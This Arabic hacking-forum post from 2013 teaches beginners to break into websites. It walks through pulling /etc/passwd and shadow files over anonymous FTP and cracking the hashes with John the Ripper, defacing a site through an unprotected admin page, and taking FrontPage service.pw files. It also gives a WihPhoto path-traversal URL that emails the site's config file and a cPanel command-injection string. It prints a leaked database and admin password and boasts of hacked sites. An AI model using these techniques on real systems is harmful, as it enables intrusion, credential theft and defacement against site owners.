هہ’ ـيہ’ثم فہرنہ’ـسا عضو مميز
عدد المساهمات : 111 السٌّمعَة : 4 تاريخ التسجيل : 19/08/2012 العمر : 36 الموقع : https://professional-hacker.yoo7.com/
| موضوع: حصريا على منتديات تعليم الهكر والأحتراف كيفية اختراق المواقع و المنتديات للمبتدئين والمحترفين الإثنين مارس 04, 2013 3:10 am | |
| بسم الله الرحمن الرحيم
><>< وما اوتيم من العلم الا قليلا ><><
صدق الله العظيم
اخوانى واحبائى فى الله وفى المنتدى الكريم اسعد الله وقتكوم باختراقات موفقه
اليوم راح نتكلم عن تعليم اختراق المواقع للمبتدئين والمحترفين فى الاختراق
نبداء بشرح الثغره وكيف معناها موافقين انشاء الله
كاتب الموضوع الاصلى الوطواط الاحمر Mr>>ReD BaT ><>< ><><><
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
بسم الله الرحمن الرحيم
وقل ربى زدنى علما
صدق الله العظيم !!
الكاتب !! الوطواط الاحمر
بسم الله """"
اولا يا شباب يعنى ايه ثغره وكيف تتطبقها وطيف تعرف ان الموقع يدعم بثغره
اسئله تدور فى ذهننا فلكى تعرف فتابع هاد الشرح مع التطيبق
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! !!!!!!!!!!!!!!!!!!!!!!!!!!
" الثغرات "
* لكي تستطيع اختراق موقع لا بد أن تعرف اسم المستخدم وكلمة المرور الخاصة بالموقع
User name-Password
وهما يكونان محفوظين في ملف يسمي
PASSWDغالبا
بعض المواقع تضع هذا الملف في الإف تي بي
ما هو إف تي بي؟
FTP=File Transfer Protocol بروتوكول نقل الملفات
تستطيع الاتصال بالموقع وسحب هذا الملف عن طريق التلنت
start==>run إبدأ ثم تشغيل
واكتب telnet
سيفتح التلنت اضغط علىRemote System ==> connect
ثم اكتب الموقع في Host Name مثلا
kahane.org أو الآيبي الخاص به
وفي PORT اكتب 21 وهو البورت الخاص بالإف تي بي
ثم اضغط connect
وبعد أن يظهر رد السيرفر اكتب ولكن..لن ترى ما كتبت!! شفرة source code
user anonymous
ثم انتر بعدها يطلب السيرفر كلمة السر اكتب
pass [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
اكتب أي بريد ككلمة سر وطبعا سيكون وهميا
ماذا فعلنا؟لقد دخلنا إلى سيرفر الموقع في وضع التخفي وبعض المواقع تسمح بهذه الخاصية وبعضها لا يسمح..
بعدها سنحصل على ملف الباسوورد
قبل ذلك أحب أن أذكر أنه يمكنك عمل الأشياء السابقة عن طريق أي برنامج إف تي بي مثل
cute ftp - ws_ftp
مثلاأو حتى الذهاب إلى المتصفح وكتابة الموقع هكذا في حقل العنوان
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
لتحصل على الملف في التلنت اكتب
retr /etc/passwd
/etc هو المجلد الذي يحتوي الملف passwd ويختلف اسم المجلد واسم ملف الباسوورد باختلاف نظام تشغيل الموقع
Sunos 5.0 etc/shadow او etc/passwd Linux etc/shadow او etc/passwd BSD4.3 –RENO etc/master.passwd AIX etc/security/passwd NT ويندوز scripts/passwd
وتختلف أسماء ملف الباسوورد بين passwd و admin.pwl و غيرها
الاختراق من الإف تي بي أصبحت طريقة قديمة لذا لن تجد موقعا حديثايضع ملف الباسوورد في إف تي بي ذكرنها فقط كمقدمة..إذا أردت تجريبها جربها على هذا الموقع
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
ولزيادة معلوماتك عن الاختراق بالف تي بي قم بتحميل الملف الموجود بنهاية الصفحة
وبعدها؟؟المشوار مازال طويلا...كلمة السر ستكون مشفرة وسنشرح كيقية كسرها في النهاية....
--------------------------------------------------------------------------------
Exploit = اسثمار = ثغرة
الجزء المهم:
الثغرات هي أخطاء برمجية في نظام التشغيل ويمكنك استغلالها للحصول على ملف الباسوورد وقاعدة البيانات وووو..إلخ
أولا يجب أن تجمع كل المعلومات الممكنة حول الموقع :
1- المنافذ المفتوحة مثل الإف تي بي والتلنت مثلا وهذ عن طريق برامج مثل
super scan
ابحث عنه في الانترنت.
2- معرفة نظام تشغيل الموقع ويندوز أم لينوكس وغيرها والفائدة من ذلك أن كل نظام له ثغراته الخاصة به واسم المجلد الذي به ملف الباسوورد يختلف من نظام تشغيل لآخر.
لمعرفة نظام التشغيل إذهب إلى الموقع
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
واكتب الموقع ثم إنتر..!!.! وستعرف بعض المعلومات عن الموقع كلآيبي ونظام التشغيل...إلخ
3- معرفة كل مايقدمه الموقع من خدمات كالبريد وغير ذلك
4- معرفة البرامج المثبتة على الموقع مثل المنتديات وبرامج السي جي آي
أنواع الثغرات
أبسط الأنواع هي التي يمكن الوصول إليها عن طريق المتصفح مثل
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
والأنواع الباقية أو الاستثمارات :
ثغرات مكتوبة بلغة بيرل *.pl
ويمكن استخدامها في لينوكس أو في ويندوز إذا كان لديك برنامج
Active Perl
ثغرات بلغة سي
*.c يمكن استخدامها في لينوكس فقط
ثغرات بلغة شل
*.shويمكن استثمارها في لينوكس فقط
ويمكنك إيجاد الكثير من الأنواع السابقة الخاصة بلينوكس فيمواقع الثغرات وإليك بعضها
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
أما ثغرات المتصفح يمكنك الكشف عنها بالبرامج الموجودة في قسم البرامج.
ويمكنك من خلال البرامج الموجودة على السيرفر كالمنتديات أو برمجيات بيرل وسيجي آي أن تبحث عن ثغرات لها في مواقع الثغرات أو المواقع السابقة.وبرمجيات بيرل وسي جي آي قد تكون كتاب زوار أو محرك بحث أو حتى عداد زوار
حسنا لنفرض أنك حصلت على ملف الباسوورد..المشكلة أن كلمةالسر تكون بداخله مضللة shadowed أو مشفرة encryption.
مثال لملف باسوورد
root0:1:Super-User:/:/sbin/sh daemon1:1::/: bin2:2::/usr/bin: sys3:3::/: adm4:4:Admin:/var/adm: lp71:8:Line Printer Admin:/usr/spool/lp: smtp0:0:Mail Daemon User:/: uucp5:5:uucp Admin:/usr/lib/uucp: nuucp9:9:uucp
ولأن ملف الباسوورد يحتوي على كلمات سر الأشخاص المرخص لهم بدخول الموقع قد لا بزيد عن عشرة أسطر وقد يصل آلاف الأسطر...
كلمات السر السابقة مضللة وهي علامة xوقد تختلف..
أما المشفرة والتي سنحصل عليها تكون هكذا:
مضللة root0:1:Super-User:/:/sbin/sh
مشفرة root:Q71KBZlvYSnVw:0:1:Super-User:/:/sbin/sh
root = أو الجذر اسم المستخدم
x = كلمةالسر ولكنها مضللة
وباقي السطر غير مهم
في الأغلب ستكون كلمة السر مضللة shadowed لذا عليك أن تبحث عن ملف آخر يحوي كلمة السر مشفرة يسمى ملف الشادو
shadow file
ويوجد في أماكن معينة تختلف باختلاف نظام التشغيل
token = الرمز الذي يعبر عن الباسوورد
Linux : /etc/shadow token = * SunOS : /etc/shadow token = يأخذ أشكال متعدده اشهرها هو * FreeBSD : /etc/master.passwd or /etc/shadow token = * والجديد هو x IRIX : /etc/shadow token = x AIX : /etc/security/passwd token = ! ConvexOS : /etc/shadow or /etc/shadpw token = *
مثال لملف شادو
root:EpGw4GekZ1B9U:11390:::::: bin:NP:6445:::::: sys:NP:6445:::::: adm:IyEDQ6VoRlLHM:10935:::::: #admin:9z8VMm6Ovcvsc:10935:::::: lp:NP:6445::::::
نجد أن كلمة السر هي
EpGw4GekZ1B9U
كيف تفك التشفير؟
عن طريق برامج مخصصة لذلك أفضلها تجده في صفحة برامج الثغرات
John the ripper
وهو يقوم بتجريب كل المحاولات الممكنة حتى يحصل على الباسوورد .
ولكن يجب أن تضع له الباسووردات في ملف مفكرة مثلا وعليك وضع الكلمة المشفرة بدلا من الx وعليك ترتيبها بحيث يكون كل حساب في سطر
طريقة تشغيله:
إذهب إلى الدوس واكتب
john passwd
حيث passwd هو الملف الذي به الباسوورد المشفرة وضعتها
سيظهر :
by Sola 97,John the Ripper Version 1.3 Copyright (c) 1996
Loaded 1 password
**v: 0 c: 6401 t: 0:00:00:01 99% c/s: 6401 w: *****DONE
وإذا أردت معرفة الباسوورد التي يخمنها الآن اضغط انتر
والباسوورد الصحيحة ستحفظ في ملف في نفس المجلد الذي به البرنامج اسمه
john.pot
وإذا أردت القيام بعملية كسر أخرى عليك إلغاء الملف أو تغيير اسمه
وفى النهايه ارجو الاستفاده من هاد الموضوع
جميع الحقوق محفوظه لدى
الوطواط الاحمر
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
الدرس الثانى ><><><
][][^][][][][^][][ وهوا ثغرات المواقع ونبداء من اول ثغراته ونبدء باولال الثغرات
~!~ ثغرة سباق المواقع ~!~
=====================
أولا إذهب إلى أي محرك بحث .. مثلا GOOGLE
وإكتبtop_list/list.php3
رح تلقى الكثير من المواقع ورح يكون اخر الموقع كدا
top_list/list.php3
مثلا هذا الموقع
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
وكذا يكون دخلنا صفحة سباق المواقع
قم بمسح هذا "list.php3" وبدله بـ
admin/updates_admin.php3
سيصبح عنوان الموقع هكذا
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
إدخل على هذا العنوان
ومن ثم سيظهر لك مربع
قم بالذهاب الى الفرونت بيج واكتب الي تبيه مثلا
HACKED BY ALNOR3S
وثم اذهب من الفرونت بيج الى خانة HTML
وانسخ مابداخله بالكامل وضعه في المربع الي في هذا العنوان
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
بعد كذا اضغط رفع ليرفع الكلام الي الصفحة
ادخل الى الموقع [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
وشوف توقيعك الي سويته في الفرونت بيج
================== عيب هذه الثغرة ان اي واحد يعرف الثغرة يقدر يخترق بعدك ...
وهذا الموقع تم اختراقه من قبلى
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
ثغرة الفرنت بيج
السلام عليكم شباب , الفرونت بيج يعتبر من اهم البرامج في انشاء المواقع , ولكن يوجد به ثغرة قويه تمكنك من اختراق موقع الضحيه وامتلاكه
وسوف اقوم بعرض هذهي الثغره بشكل مبسط
نبدا :
اول شي لازم تعرف اذا الموقع يدعم الفرونت بيج وله لا روح على هذا الموقع [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] واكتب اسم الموقع وستجد معلومات عن الموقع , ومن بينها اذا كان يدعم الفرونت بيج وله لا .
شرح الثغرة :
الفرونت بيج عند تنصيبه يقوم باقامة فولدرات وهي :
/_private
/_vti_bin
/_vti_cnf
/_vti_log
/_vti_pvt (اخطرهم )
/_vti_txt
ولتطبيق الثغره , اكتب اسم الموقع في المتصفح وبعدين اكتب وراه الثغره مثال : /http://xxxx.com/_vti_pvt
او يمكنك استخدام برامج البحث عن ثغرات المواقع , و الي من اهمها برنامج عمران omran scan
اوكيه بعد هذي الخطوه بتدخل على الفولدر الي كتبناه (_vit_pvt_/)
وداخله بتحصل ملف مهم جدا باسم service.pw
هذا الملف يحتوي على باسورد صاحب الموقع ولكنه مشفر بمقياس des
ولفك الشفره بنستخدم برنامج john de ripe
حمل الملف السابق service.pw على جهازك وافتح الملف بواسطة برنامج john de ripe , الي يعتمد على تحويل الملف من encypretd الى plan text يعنى تحويل الكلمه المشفره الى كلمه عاديه .
وبعد ما تفك الشفره خلاص صار الباسورد في ايدك وتستطيع التحكم بالموقع عن طريق الفرونت بيج او رفعه ببرامج ال ftp .
اتمنى انكم استفدتو , وانكم ما تستخدمون الطريقة في اذيت اخوانكم المسلمين .
وهذا برنامج john de riper [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ ثغرات المنتديات
!!!! sniper-x
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
يتــــــــــــــــــــــــــــــــبع ][][^][][][][^][][
ثغرة عبارة عن ثغرة php
هذه الثغرة عبارة عن ثغرة php
هذه الثغرة تعتمد على نظام الاختراق العشوائي بمعني أننا سنبحث عن هذه الثغرة في المواقع التي تحتوي على هذه الثغرة من خلال محرك البحث جوجل نضع في خانة البحث "powered by wihphoto"
طبعا سوف يجد لنا مواقع كثيرة نختار الموقع الأول على سبيل المثال وهو [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
نقوم بحذف من الموقع admin.php ونضيف إليه الجمله التالية sendphoto.php?album=..&pic=config.inc.php
فبالتالي يصبح العنوان لدينا كالتالي
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
ادخل تحت جمله Sende config.inc.php an
اميلك بالكامل واضغط على زر الارسال سوف تصلك رسالة فورية بعد ثواني
سوف تصلك على اميلك رسالة بها ملف ملف مرفق اسمه ._albums_.._config.inc.php
عندما تقوم بفتح هذا الملف سوف تجد التالي
FREE FOR NON-COMMERCIAL USE <-- */ / ************************* ************************* ************************* **/
// WihPhoto Versionsnummer // ======================= $version = "0.86-dev";
$language = "german.php"; // Sprachfiles z.B. "german.php" fuer Deutsch // siehe $language Verzeichnis
// http - Adresse: // =============== // Bei 0.86-dev noch ohne Bedeutung! $wihphoto_http = "http://";
// Verzeichnisse: // ============== $wihphoto_dir = "/var/www/web1/html/photogallerie"; // Pfad absolut $wihphotodir = "/var/www/web1/html/photogallerie"; // Pfad absolut $pix_base = "albums"; // ... die Orginalphotos Pfad relativ $dyn_base = "auto"; // ... die dynamisch generierten Photos Pfad relativ $lang_dir = "languages"; // ... language packs Pfad relativ
// WihPhoto - Darstellungsoptionen // ========================= ====== $items_per_page = 20; // maximale Anzahl Photos/Seite $display_cols = 4; // Spalten pro Seite $default_size = 512; // Standardbreite der Bilder bei Betrachtung des Albums $thumb_size = 120; // Breite der generierten Thumpnails
// Breite der Bilder welche generiert werden // ========================= ================ $viewsizes = array(400,512,640,800,"Original");
// Wenn man einen Link zur Hauptseite der Homepage machen mِchte kann er mit $sitehome // zur Navigationsleiste hinzugefügt werden // ========================= ========================= ========================= ======== $sitehome = "http://spikies-chinchilla-news.de/basefr.htm";
// Startseite von WihPhoto: 1 = Umfangreich, mit Bild, Beschreibung, .... // 0 = einfache Auflistung der Alben // ========================= ========================= ==================== $startsite = 1;
// MySQL-DB Einstellungen // ====================== $database = "usr_web1_5"; //MySQL Datenbankname $sqlhost = "localhost"; //MySQL Hostname $sqluser = "web1"; //MySQL Username $sqlpass = "q+q27rym"; //MySQL Passwort
// Passwort zum hinzufügen von Bildinformationstext // ========================= ======================= $adminpass= "galleriemaster";
// Wird PHP im SAFE MODE betrieben? // ========================= ======= $safemode = false; // true ... SAFE MODE, false ... kein SAFE MODE
// E-Mail Einstellungen für die "SendPhoto" Funktion // ========================= ======================== $subject = "Spikies-Photogallerie"; // E-Mail Subject $replyto = "Spike@spikies-chinchilla-news.de"; // Sende E-Mail Adresse
// ----------------------------------------------------------------------- // ab hier keine ؤnderungen notwendig! // -----------------------------------------------------------------------
// MySQL - Tabellennamen // =====================
$wp_start = "wp_start"; // Startseite (Albennamen, Albuminfos, Reihung, ...) $wp_photoinfo = "wp_photoinfo"; // Beschreibungen zu den einzelnen Photos
// Zur Grafikenerzeugung: // "gd" ... GD (http://www.boutell.com/gd) // "im" ... ImageMagick (http://www.imagemagick.org/) // ========================= = $ImageTool = "gd";
// Falls als $ImageTool "im" also ImageMagick gewنhlt wurde // muss der Pfad zur "convert" Funktion angegeben werden! $convert = "/usr/bin/convert";
// EXIF Support // (funkt noch nicht!) // =================== $show_exif = 0;
// Rand bei Thumpnails // =================== $thumb_border = 1;
// Sprachfiles laden: require ("$wihphoto_dir/$lang_dir/$language"); ?>
************************* ************************* ************************* ****** ولكن اعتقد أن أهم شئ من هذا الملف كله هو هذا المقطع
// MySQL-DB Einstellungen // ====================== $database = "usr_web1_5"; //MySQL Datenbankname $sqlhost = "localhost"; //MySQL Hostname $sqluser = "web1"; //MySQL Username $sqlpass = "q+q27rym"; //MySQL Passwort
// Passwort zum hinzufügen von Bildinformationstext // ========================= ======================= $adminpass= "galleriemaster";
حيث يذكر لن االباسووردات الخاصة بالموقع وقاعدة البيانات :8: :8:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
ثغره لوحه التحكم المواقع Cpanel للكاتب SmaRt
المعروف أن Cpanel هي لوحة تحكم تضاف للمواقع لإمكانية التحكم في جميع ما يحتويه الموقع يوجد منفذ لعمل دفع أو ما يسمونه أمر ريموت في البرنامج Cpanel اكتشفت ثغرة في هذا المنفذ الذي يظهر المطلوب لتصحيح النقص الخارجي أو الذي يكون مزود ببيانات للسكربت الذي يقوم باسترجاع الاسم والرقم السري
الهكرز طبعا استغلوا هذه الثغرة من المشكلة بدهاء وبراعة حيث يطلبون الURI كأنهم يستخدمون السكربت عادي ليجهزوا خاصية الشيل والأوامر التحكمية لكل قيمة ومتغير (خلصنا مناقشة )
نأتي الآن للنسخ المصابة وهي : cPanel cPanel 5.0 cPanel cPanel 5.3 cPanel cPanel 6.0 cPanel cPanel 6.2 cPanel cPanel 6.4 cPanel cPanel 6.4.1 cPanel cPanel 6.4.2 .STABLE_48 cPanel cPanel 6.4.2 cPanel cPanel 7.0 cPanel cPanel 8.0 cPanel cPanel 9.0 cPanel cPanel 9.1
والثغرة تطبق على النحو التاالي : [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
حيث ان example.com هو عنوان الموقع اعذروني لاني ما جربت الثغرة الى الان لاني اول ما قرأتها وضعتها لكم
طريقة اكتشاف الثغرة : وصلت رسالة الى موقع [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] من Arab ViruZ أحد أعضاء Saudi Devilz Team
والرسالة على النحو التالي (ترجمتها) :- العنوان : Cpanel 8 تحتوي على مشكلة ؟؟ البريد : Arab VieruZ <arabviersus hotmail com>
مرحبا جميعا
عندما جربت ارجع الباسورد تبعي
جربت هذه الوصلة : [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
لكنني حصلت على هذا : */
sh: line 1: /var/cpanel/users/: is a directory "sh: line 1: >ls: command not found"
Password Reset Resetting password for |">ls"|: A confirmation email has been sent to the email address on file.
*/
انظر الى هذه sh: line 1: >ls: command not found
هل هذه مشكلة
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
!!!! sniper-x --------------------------------------------------- الحل ---------------------------------------------------
للحماية من هذه الثغرة قم باغلاق الـ HTML في (المنتدى + الرسائل الخاصة + التواقيع + التقويم + ... ) (واي منفذ يمكن من خلاله وضع كود HTML باي صورة كانت )
كما يجب اغلا كود الـ IMG .. لانه ببساطة بامكانك استخدامه بدل كلمة <script> فاذا وضعت <img> او <Demon> او اي كلمة اخرى فانه سيتم تنفيذ السكربت بشكل او باخر ... لذا كن حذرا واغلق هذه المنافذ . Be Secret .. Dont' be Lamer . منتديات تعليم الهكر و الأحتراف أدمٌٍن هيثمٍُ فرنساٍُ هكٍُر المٍُوت ٍُ للشكأوىٍُ [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] | |
|